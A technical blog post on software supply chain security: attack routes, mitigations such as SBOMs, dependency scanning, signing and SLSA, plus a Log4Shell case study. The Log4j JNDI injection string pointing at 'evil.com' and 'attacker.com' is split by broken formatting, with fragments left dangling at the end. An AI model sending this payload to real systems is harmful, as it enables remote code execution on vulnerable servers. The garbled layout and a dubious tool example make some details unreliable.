Blog
  • Welcome to egonzalez blog
  • Software Supply Chain Security
    • Software Supply Chain Security: Why It Matters
    • Software Supply Chain Security: A Technical Deep Dive
    • SLSA and the Software Supply Chain Security: Time to Get Serious
  • Provenance
    • Understanding Provenance in Software Supply Chain Security
  • Building a secure development framework
  • Hacking
    • Index
      • Hack the box writeups
        • Dyplesher HTB writeup
        • Fatty HTB writeup
        • Oouch HTB writeup
        • Sauna HTB writeup
      • Python Vulnerabilities
        • Data Deserialization
          • Pickle
          • XML
          • YAML
      • Hacking cheatsheet
  • DevSecOps
    • Index
      • Gitlab CI minikube development environment
      • Gerrit review minikube
      • Gerrit and gitlab replication and CI job hooks on k8s
      • Vault integration with Gitlab CI
      • Gitlab CI template for DefectDojo
      • Falco real time runtime thread detection on k8s
      • Zarf - Airgap deployment in kubernetes
      • OWASP Dependency-track
      • OpenDaylight in a Docker
      • To conditional or to skip, that's the Ansible question
      • Spacewalk Red Hat Satellite v5 in a Docker container PoC
      • Ansible INI file module
  • OpenStack
    • Index
      • OpenStack tacker and service function chaining sfc with kolla
      • Deploy OpenStack designate with kolla-ansible
      • OpenStack keystone zero downtime upgrade process newton to ocata
      • Midonet integration with OpenStack Mitaka
      • OpenStack kolla deployment
      • Magnum in RDO OpenStack Liberty
      • Nova VNC flows under the hood
      • Ceph Ansible baremetal deployment
      • Rally OpenStack benchmarking with Docker
      • OpenStack affinity/anti-affinity groups
      • Migrate keystone v2.0 to keystone v3 OpenStack
      • Neutron DVR OpenStack Liberty
      • OpenStack segregation with availability zones and host aggregates
      • Nova Docker driver
      • Murano in RDO OpenStack manual installation
      • Ceph RadosGW admin Ops
      • Multiple store locations for glance images
      • List all tenants belonging an user
      • Load balancer as a service OpenStack LbaaS
      • OpenStack nova API start error
      • Delete OpenStack neutron networks
Powered by GitBook
On this page
  • What’s in the Supply Chain?
  • How Attacks Happen
  • Technical Risks
  • Mitigation: The Tech Way
  • Real-World Example: Log4j
  • Tools You Need
  • Standards Are Coming
  • Wrap-Up

Was this helpful?

  1. Software Supply Chain Security

Software Supply Chain Security: A Technical Deep Dive

PreviousSoftware Supply Chain Security: Why It MattersNextSLSA and the Software Supply Chain Security: Time to Get Serious

Last updated 2 months ago

Was this helpful?

Let’s get into the gritty details of software supply chain security. This isn’t just about ideas—it’s about code, tools, and how things break.

What’s in the Supply Chain?

Your software isn’t built from nothing. It’s a mix of:

  • Source Code: What you write.

  • Dependencies: Libraries like numpy, requests, or log4j. You pull these from places like PyPI, npm, or Maven.

  • Build Tools: Compilers, packagers (e.g., gcc, webpack), and CI/CD pipelines (e.g., Jenkins, GitHub Actions).

  • Third-Party Stuff: APIs, cloud services, or pre-built binaries.

Every piece is a link. If one fails, the chain collapses.

How Attacks Happen

Hackers don’t always smash your front door—they sneak through the back. Here’s how:

  1. Dependency Poisoning: They upload a fake package to npm or PyPI with a name like reqeusts (see the typo?). You grab it by mistake—boom, malware.

  2. Compromised Updates: They hack a legit project (e.g., SolarWinds) and inject code into an update. You install it, thinking it’s safe.

  3. Build System Takeover: They hit your CI/CD pipeline. Think of the Codecov breach—hackers stole credentials and messed with builds.

  4. Old Vulnerabilities: You use `log4j 2.14`. A flaw (CVE-2021-44228) lets hackers run code remotely. One line—`${jndi:ldap://—and you’re done.

Technical Risks

  • Transitive Dependencies: You use Library A. It uses Library B. B has a flaw. You’re screwed, even if A looks clean.

  • Unsigned Code: No signature? No proof it’s legit. Anyone could’ve tampered with it.

  • Misconfigured Tools: Your Docker image pulls from latest. Hackers replace it with junk. Game over.

  • Weak Provenance: You don’t know where that .jar file came from. Was it GitHub or some shady server?

Mitigation: The Tech Way

Here’s how to fight back, step by step.

  1. Software Bill of Materials (SBOM)

  • What: A list of every component in your software (e.g., cyclonedx or SPDX format).

  • How: Tools like syft or Dependency-Track scan your project and spit out an SBOM.

  • Why: You can’t fix what you don’t know.

  1. Dependency Scanning

  • What: Check for known vulnerabilities.

  • Tools: Dependabot (GitHub), Snyk, OWASP Dependency-Check.

  • Example: Run snyk test on your package.json. It flags lodash < 4.17.21 (CVE-2021-23337).

  • Fix: Update to a safe version (npm install lodash@latest).

  1. Code Signing

  • What: Cryptographic proof your code is yours.

  • How: Use GPG or Sigstore. Sign a release with gpg --sign myapp.tar.gz.

  • Verify: gpg --verify myapp.tar.gz.sig. If it’s tampered, it fails.

  1. Lock Down Builds

  • What: Make builds repeatable and safe.

  • How: Use lock files (package-lock.json, Pipfile.lock) and pin versions (e.g., requests==2.28.1, not requests>=2.28).

  • Extra: Run builds in isolated containers (Docker) with --network none.

  1. Provenance Tracking

  • What: Prove where code came from.

  • How: Tools like in-toto or SLSA (Supply-chain Levels for Software Artifacts).

  • Example: SLSA Level 1 requires a build script. Level 3 needs a trusted builder (e.g., Google’s Borg).

  1. Patch Fast

  • What: Fix flaws ASAP.

  • How: Monitor CVEs (e.g., NVD database) and patch. For Log4j, upgrade to 2.17.1.

  • Test: Use a staging environment first—don’t break production.

Real-World Example: Log4j

  • Attack: Hacker sends this in a chat message. Your app logs it. They own your server.

  • Fix: Update to 2.17.1, disable JNDI lookups (log4j2.formatMsgNoLookups=true), or ditch Log4j for something lighter.

  • Lesson: One tiny library can burn everything down.

Tools You Need

  • Static Analysis: SonarQube or CodeQL to spot bad patterns.

  • Container Scanning: Trivy or Clair for Docker images.

  • Runtime Protection: Falco to catch weird behavior in production.

  • Verification: cosign (Sigstore) for signing containers.

Standards Are Coming

  • SLSA: Google’s framework. Levels 1–4, from basic logging to tamper-proof builds.

  • EU CRA: By 2025, you’ll need SBOMs and audits for critical software. Non-compliance? Fines.

  • NIST SSDF: US guidelines for secure development. Follow it or lose contracts.

Wrap-Up

Software supply chain security is a beast. It’s not just “update and pray.” You need tools, processes, and discipline. One weak link—say, an unpatched openssl—and hackers win. Dig into your dependencies, sign your builds, and scan everything. It’s hard work, but the alternative is worse.

Problem: `log4j-core` versions 2.0–2.14.1 had a flaw. A string like `${jndi:ldap:// triggered remote code execution.

evil.com/a}`
attacker.com/a}`